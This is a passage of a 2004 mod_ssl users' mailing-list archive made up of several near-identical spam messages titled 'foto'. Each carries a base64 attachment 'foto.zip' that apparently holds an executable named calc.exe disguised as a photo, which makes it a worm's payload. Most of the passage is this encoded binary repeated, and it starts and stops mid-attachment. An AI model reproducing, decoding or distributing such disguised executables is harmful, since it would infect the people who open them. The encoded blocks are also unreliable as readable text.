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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------jzdhopwmmomhsclpqaxo--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 02:56:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9C79FA8995; Wed,  1 Sep 2004 02:56:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dell2000.net (c-67-163-106-87.client.comcast.net [67.163.106.87])
	by master.modssl.org (Postfix) with SMTP id 9034EA8978
	for ; Wed,  1 Sep 2004 02:56:36 +0200 (CEST)
Date: Tue, 31 Aug 2004 19:56:33 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------kdwzohuuklsefmxcherm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------kdwzohuuklsefmxcherm
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------kdwzohuuklsefmxcherm
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------kdwzohuuklsefmxcherm--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 03:00:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7F01AA8943; Wed,  1 Sep 2004 03:00:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from S0027298858-BITFALL02.net (c-67-163-91-163.client.comcast.net [67.163.91.163])
	by master.modssl.org (Postfix) with SMTP id 82627A8934
	for ; Wed,  1 Sep 2004 03:00:23 +0200 (CEST)
Date: Tue, 31 Aug 2004 19:58:24 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------objlonwhxspapmupiqyo"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------objlonwhxspapmupiqyo
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------objlonwhxspapmupiqyo
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
